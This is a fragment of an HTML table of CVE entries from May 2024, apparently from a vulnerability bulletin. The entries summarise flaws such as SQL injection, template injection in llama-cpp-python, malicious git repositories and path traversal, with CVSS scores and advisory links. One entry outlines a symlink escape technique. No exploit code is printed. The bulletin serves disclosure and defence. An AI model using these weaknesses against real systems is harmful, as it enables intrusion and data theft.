<td>YMS VIS Pro is an information system for veterinary and food administration, veterinarians and farm. Due to a combination of improper method for system credentials generation and weak password policy, passwords can be easily guessed and enumerated through brute force attacks. Successful attacks can lead to unauthorised access and execution of operations based on assigned user permissions. This vulnerability affects VIS Pro in versions &lt;= 3.3.0.6. This vulnerability has been mitigated by changes in authentication mechanisms and implementation of additional authentication layer and strong password policies.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3263&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3263" target="_blank">CVE-2024-3263</a><br><a href="https://remediata.com/blog/cve-2024-3263-improper-authentication-in-yms-vis-pro/" target="_blank">incident@nbu.gov.sk</a><br><a href="https://www.svps.sk/vis/" target="_blank">incident@nbu.gov.sk</a></td>
</tr>
<tr>
<td>ZTE--ZXUN-ePDG<br> </td>
<td>ZTE ZXUN-ePDG product, which serves as the network node of the VoWifi system, under by default configuration, uses a set of non-unique cryptographic keys during establishing a secure connection(IKE) with the mobile devices connecting over the internet . If the set of keys are leaked or cracked, the user session informations using the keys may be leaked.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22064&amp;vector=CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" target="_blank" title="CVSS V3 Score">8.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22064" target="_blank">CVE-2024-22064</a><br><a href="https://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1035524" target="_blank">psirt@zte.com.cn</a></td>
</tr>
<tr>
<td>Zabbix--Zabbix<br> </td>
<td>Zabbix server can perform command execution for configured scripts. After command is executed, audit entry is added to "Audit Log". Due to "clientip" field is not sanitized, it is possible to injection SQL into "clientip" and exploit time based blind SQL injection.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22120&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22120" target="_blank">CVE-2024-22120</a><br><a href="https://support.zabbix.com/browse/ZBX-24505" target="_blank">security@zabbix.com</a></td>
</tr>
<tr>
<td>abetlen--llama-cpp-python<br> </td>
<td>llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` 's Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34359&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34359" target="_blank">CVE-2024-34359</a><br><a href="https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>alttextai--Alt Text AI Automatically generate image alt text for SEO and accessibility<br> </td>
<td>The Alt Text AI - Automatically generate image alt text for SEO and accessibility plugin for WordPress is vulnerable to generic SQL Injection via the 'last_post_id' parameter in all versions up to, and including, 1.4.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4847&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4847" target="_blank">CVE-2024-4847</a><br><a href="https://plugins.trac.wordpress.org/browser/alttext-ai/trunk/includes/class-atai-attachment.php#L677" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3086107/" target="_blank">security@wordfence.com</a><br><a href="https://wordpress.org/plugins/alttext-ai/#developers" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3c192623-eb46-4f1d-b897-433ac80608cb?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>appscreo--Easy Social Share Buttons<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in appscreo Easy Social Share Buttons allows PHP Local File Inclusion.This issue affects Easy Social Share Buttons: from n/a through 9.4.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31300&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31300" target="_blank">CVE-2024-31300</a><br><a href="https://patchstack.com/database/vulnerability/easy-social-share-buttons3/wordpress-easy-social-share-buttons-plugin-9-4-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>artbees--JupiterX<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in artbees JupiterX allows PHP Local File Inclusion.This issue affects JupiterX: from n/a through 3.0.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-32110&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-32110" target="_blank">CVE-2023-32110</a><br><a href="https://patchstack.com/database/vulnerability/jupiterx/wordpress-jupiterx-theme-3-0-0-subscriber-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>aws--amazon-redshift-jdbc-driver<br> </td>
<td>The Amazon JDBC Driver for Redshift is a Type 4 JDBC driver that provides database connectivity through the standard JDBC application program interfaces (APIs) available in the Java Platform, Enterprise Editions. Prior to version 2.1.0.28, SQL injection is possible when using the non-default connection property `preferQueryMode=simple` in combination with application code which has a vulnerable SQL that negates a parameter value. There is no vulnerability in the driver when using the default, extended query mode. Note that `preferQueryMode` is not a supported parameter in Redshift JDBC driver, and is inherited code from Postgres JDBC driver. Users who do not override default settings to utilize this unsupported query mode are not affected. This issue is patched in driver version 2.1.0.28. As a workaround, do not use the connection property `preferQueryMode=simple`. (NOTE: Those who do not explicitly specify a query mode use the default of extended query mode and are not affected by this issue.)</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32888&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">10</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32888" target="_blank">CVE-2024-32888</a><br><a href="https://github.com/aws/amazon-redshift-jdbc-driver/commit/0d354a5f26ca23f7cac4e800e3b8734220230319" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/aws/amazon-redshift-jdbc-driver/commit/12a5e8ecfbb44c8154fc66041cca2e20ecd7b339" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/aws/amazon-redshift-jdbc-driver/commit/bc93694201a291493778ce5369a72befeca5ba7d" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-x3wm-hffr-chwm" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-24rp-q3w6-vc56" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>dataease--dataease<br> </td>
<td>DataEase is an open source data visualization analysis tool. Due to the lack of restrictions on the connection parameters for the ClickHouse data source, it is possible to exploit certain malicious parameters to achieve arbitrary file reading. The vulnerability has been fixed in v1.18.19.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31441&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31441" target="_blank">CVE-2024-31441</a><br><a href="https://github.com/dataease/dataease/security/advisories/GHSA-h7hj-7wg6-p5wh" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>dotmesh-io--dotmesh<br> </td>
<td>Dotmesh is a git-like command-line interface for capturing, organizing and sharing application states. In versions 0.8.1 and prior, the unsafe handling of symbolic links in an unpacking routine may enable attackers to read and/or write to arbitrary locations outside the designated target folder. The routine `untarFile` attempts to guard against creating symbolic links that point outside the directory a tar archive is extracted to. However, a malicious tarball first linking `subdir/parent` to `..` (allowed, because `subdir/..` falls within the archive root) and then linking `subdir/parent/escapes` to `..` results in a symbolic link pointing to the tarball's parent directory, contrary to the routine's goals. This issue may lead to arbitrary file write (with same permissions as the program running the unpack operation) if the attacker can control the archive file. Additionally, if the attacker has read access to the unpacked files, they may be able to read arbitrary system files the parent process has permissions to read. As of time of publication, no patch for this issue is available.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2020-26312&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">8.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2020-26312" target="_blank">CVE-2020-26312</a><br><a href="https://github.com/dotmesh-io/dotmesh/blob/master/pkg/archiver/tar.go#L255" target="_blank">security-advisories@github.com</a><br><a href="https://securitylab.github.com/advisories/GHSL-2020-254-zipslip-dotmesh/" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>eProsima--Fast-DDS<br> </td>
<td>FastDDS is a C++ implementation of the DDS (Data Distribution Service) standard of the OMG (Object Management Group). Prior to versions 2.14.1, 2.13.5, 2.10.4, and 2.6.8, when a publisher serves a malformed `RTPS` packet, the subscriber crashes when creating `pthread`. This can remotely crash any Fast-DDS process, potentially leading to a DOS attack. Versions 2.14.1, 2.13.5, 2.10.4, and 2.6.8 contain a patch for the issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30258&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" target="_blank" title="CVSS V3 Score">8.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30258" target="_blank">CVE-2024-30258</a><br><a href="https://drive.google.com/file/d/19W5UC52hPnAqVq_boZWO45d1TJ4WoCSh/view?usp=sharing" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/eProsima/Fast-DDS/commit/65236f93e9c4ea3ff9a49fba4dfd9e43eb94037b" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/eProsima/Fast-DDS/security/advisories/GHSA-53xw-465j-rxfh" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>eProsima--Fast-DDS<br> </td>
<td>FastDDS is a C++ implementation of the DDS (Data Distribution Service) standard of the OMG (Object Management Group). Prior to versions 2.14.1, 2.13.5, 2.10.4, and 2.6.8, when a publisher serves malformed `RTPS` packet, heap buffer overflow occurs on the subscriber. This can remotely crash any Fast-DDS process, potentially leading to a DOS attack. Versions 2.14.1, 2.13.5, 2.10.4, and 2.6.8 contain a patch for the issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30259&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" target="_blank" title="CVSS V3 Score">8.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30259" target="_blank">CVE-2024-30259</a><br><a href="https://drive.google.com/file/d/1Y2bGvP3UIOJCLh_XEURLdhrM2Sznlvlp/view?usp=sharing" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/eProsima/Fast-DDS/security/advisories/GHSA-qcj9-939p-p662" target="_blank">security-advisories@github.com</a><br><a href="https://vimeo.com/907641887?share=copy" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>freescout-helpdesk--freescout<br> </td>
<td>FreeScout is a free, self-hosted help desk and shared mailbox. A stored HTML Injection vulnerability has been identified in the Email Receival Module of the Freescout Application. The vulnerability allows attackers to inject malicious HTML content into emails sent to the application's mailbox. This vulnerability arises from improper handling of HTML content within incoming emails, allowing attackers to embed malicious HTML code in the context of the application's domain. Unauthenticated attackers can exploit this vulnerability to inject malicious HTML content into emails. This could lead to various attacks such as form hijacking, application defacement, or data exfiltration via CSS injection. Although unauthenticated attackers are limited to HTML injection, the consequences can still be severe. Version 1.8.139 implements strict input validation and sanitization mechanisms to ensure that any HTML content received via emails is properly sanitized to prevent malicious HTML injections.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34697&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34697" target="_blank">CVE-2024-34697</a><br><a href="https://github.com/freescout-helpdesk/freescout/commit/99a4b4b4e153c82e273e549b9efbf6db4a2d8328" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-985r-6qfc-hg8m" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>froxlor--Froxlor<br> </td>
<td>Froxlor is open source server administration software. Prior to 2.1.9, a Stored Blind Cross-Site Scripting (XSS) vulnerability was identified in the Failed Login Attempts Logging Feature of the Froxlor Application. An unauthenticated User can inject malicious scripts in the loginname parameter on the Login attempt, which will then be executed when viewed by the Administrator in the System Logs. By exploiting this vulnerability, the attacker can perform various malicious actions such as forcing the Administrator to execute actions without their knowledge or consent. For instance, the attacker can force the Administrator to add a new administrator controlled by the attacker, thereby giving the attacker full control over the application. This vulnerability is fixed in 2.1.9.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34070&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34070" target="_blank">CVE-2024-34070</a><br><a href="https://github.com/froxlor/Froxlor/commit/a862307bce5cdfb1c208b835f3e8faddd23046e6" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/froxlor/Froxlor/security/advisories/GHSA-x525-54hf-xr53" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>getgrav--grav<br> </td>
<td>Grav is a file-based Web platform. Prior to version 1.7.46, a low privilege user account with page edit privilege can read any server files using Twig Syntax. This includes Grav user account files - `/grav/user/accounts/*.yaml`. This file stores hashed user password, 2FA secret, and the password reset token. This can allow an adversary to compromise any registered account and read any file in the web server by resetting a password for a user to get access to the password reset token from the file or by cracking the hashed password. A low privileged user may also perform a full account takeover of other registered users including Administrators. Version 1.7.46 contains a patch.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34082&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" target="_blank" title="CVSS V3 Score">8.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34082" target="_blank">CVE-2024-34082</a><br><a href="https://github.com/getgrav/grav/commit/b6bba9eb99bf8cb55b8fa8d23f18873ca594e348" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/getgrav/grav/security/advisories/GHSA-f8v5-jmfh-pr69" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>git--git<br> </td>
<td>Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, repositories with submodules can be crafted in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a `.git/` directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. If symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. As always, it is best to avoid cloning repositories from untrusted sources.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32002&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32002" target="_blank">CVE-2024-32002</a><br><a href="https://git-scm.com/docs/git-clone#Documentation/git-clone.txt---recurse-submodulesltpathspecgt" target="_blank">security-advisories@github.com</a><br><a href="https://git-scm.com/docs/git-config#Documentation/git-config.txt-coresymlinks" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/git/git/commit/97065761333fd62db1912d81b489db938d8c991d" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/git/git/security/advisories/GHSA-8h77-4q3w-gfgv" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>git--git<br> </td>
<td>Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, an attacker can prepare a local repository in such a way that, when cloned, will execute arbitrary code during the operation. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. As a workaround, avoid cloning repositories from untrusted sources.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32004&amp;vector=CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32004" target="_blank">CVE-2024-32004</a><br><a href="https://git-scm.com/docs/git-clone" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/git/git/commit/f4aa8c8bb11dae6e769cd930565173808cbb69c8" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/git/git/security/advisories/GHSA-xfc6-vwr8-r389" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>git--git<br> </td>
<td>Git is a revision control system. The Git project recommends to avoid working in untrusted repositories, and instead to clone it first with `git clone --no-local` to obtain a clean copy. Git has specific protections to make that a safe operation even with an untrusted source repository, but vulnerabilities allow those protections to be bypassed. In the context of cloning local repositories owned by other users, this vulnerability has been covered in CVE-2024-32004. But there are circumstances where the fixes for CVE-2024-32004 are not enough: For example, when obtaining a `.zip` file containing a full copy of a Git repository, it should not be trusted by default to be safe, as e.g. hooks could be configured to run within the context of that repository. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. As a workaround, avoid using Git in repositories that have been obtained via archives from untrusted sources.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32465&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32465" target="_blank">CVE-2024-32465</a><br><a href="https://git-scm.com/docs/git#_security" target="_blank">security-advisories@github.com</a><br><a href="https://git-scm.com/docs/git-clone" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/git/git/commit/7b70e9efb18c2cc3f219af399bd384c5801ba1d7" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/git/git/security/advisories/GHSA-vm9j-46j9-qvq4" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>google -- chrome<br> </td>
<td>Use after free in Visuals in Google Chrome prior to 124.0.6367.201 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4671&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4671" target="_blank">CVE-2024-4671</a><br><a href="https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_9.html" target="_blank">chrome-cve-admin@google.com</a><br><a href="https://issues.chromium.org/issues/339266700" target="_blank">chrome-cve-admin@google.com</a></td>
</tr>
<tr>
<td>hakeemnala--Build App Online<br> </td>
<td>The Build App Online plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0.21. This is due to missing authentication checking in the 'set_user_cart' function with the 'user_id' header value. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3658&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3658" target="_blank">CVE-2024-3658</a><br><a href="https://plugins.trac.wordpress.org/browser/build-app-online/tags/1.0.21/public/class-build-app-online-public.php#L814" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/65d423ad-da51-4616-860d-2b9354d44147?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>hoppscotch--hoppscotch-extension<br> </td>
<td>The Hoppscotch Browser Extension is a browser extension for Hoppscotch, a community-driven end-to-end open-source API development ecosystem. Due to an oversight during a change made to the extension in the commit d4e8e4830326f46ba17acd1307977ecd32a85b58, a critical check for the origin list was missed and allowed for messages to be sent to the extension which the extension gladly processed and responded back with the results of, while this wasn't supposed to happen and be blocked by the origin not being present in the origin list. This vulnerability exposes Hoppscotch Extension users to sites which call into Hoppscotch Extension APIs internally. This fundamentally allows any site running on the browser with the extension installed to bypass CORS restrictions if the user is running extensions with the given version. This security hole was patched in the commit 7e364b928ab722dc682d0fcad713a96cc38477d6 which was released along with the extension version `0.35`. As a workaround, Chrome users can use the Extensions Settings to disable the extension access to only the origins that you want. Firefox doesn't have an alternative to upgrading to a fixed version.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34714&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34714" target="_blank">CVE-2024-34714</a><br><a href="https://github.com/hoppscotch/hoppscotch-extension/commit/7e364b928ab722dc682d0fcad713a96cc38477d6" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/hoppscotch/hoppscotch-extension/commit/d4e8e4830326f46ba17acd1307977ecd32a85b58" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/hoppscotch/hoppscotch-extension/security/advisories/GHSA-jjh5-pvqx-gg5v" target="_blank">security-advisories@github.com</a><br><a href="https://server.yadhu.in/poc/hoppscotch-poc.html" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>icegram--Email Subscribers by Icegram Express Email Marketing, Newsletters, Automation for WordPress &amp; WooCommerce<br> </td>
<td>The Email Subscribers by Icegram Express plugin for WordPress is vulnerable to unauthorized access of data, modification of data, and loss of data due to a missing capability check on the handle_ajax_request function in all versions up to, and including, 5.7.19. This makes it possible for authenticated attackers, with subscriber-level access and above, to cause a loss of confidentiality, integrity, and availability, by performing multiple unauthorized actions. Some of these actions could also be leveraged to conduct PHP Object Injection and SQL Injection attacks.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4010&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4010" target="_blank">CVE-2024-4010</a><br><a href="https://plugins.trac.wordpress.org/changeset/3083762/email-subscribers" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/23bfcdd1-b99d-47eb-9f88-96f9ecc53b32?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>jetmonsters--Hotel Booking Lite<br> </td>
<td>The Hotel Booking Lite plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.11.1 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4413&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4413" target="_blank">CVE-2024-4413</a><br><a href="https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/trunk/includes/shortcodes/checkout-shortcode/step-checkout.php#L149" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3084187%40motopress-hotel-booking-lite%2Ftrunk&amp;old=3081058%40motopress-hotel-booking-lite%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d7f1283-a274-49a2-8bec-da178771b13a?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>jottlieb--Last Viewed Posts by WPBeginner<br> </td>
<td>The Last Viewed Posts by WPBeginner plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0.0 via deserialization of untrusted input from the LastViewedPosts Cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3070&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3070" target="_blank">CVE-2024-3070</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3062246%40last-viewed-posts&amp;new=3062246%40last-viewed-posts&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b6c5cc05-b147-46f6-aaa9-4c82aae1b544?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>kognetiks--Kognetiks Chatbot for WordPress<br> </td>
<td>The Kognetiks Chatbot for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the chatbot_chatgpt_upload_file_to_assistant function in all versions up to, and including, 1.9.9. This makes it possible for unauthenticated attackers, with to upload arbitrary files on the affected site's server which may make remote code execution possible.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4560&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
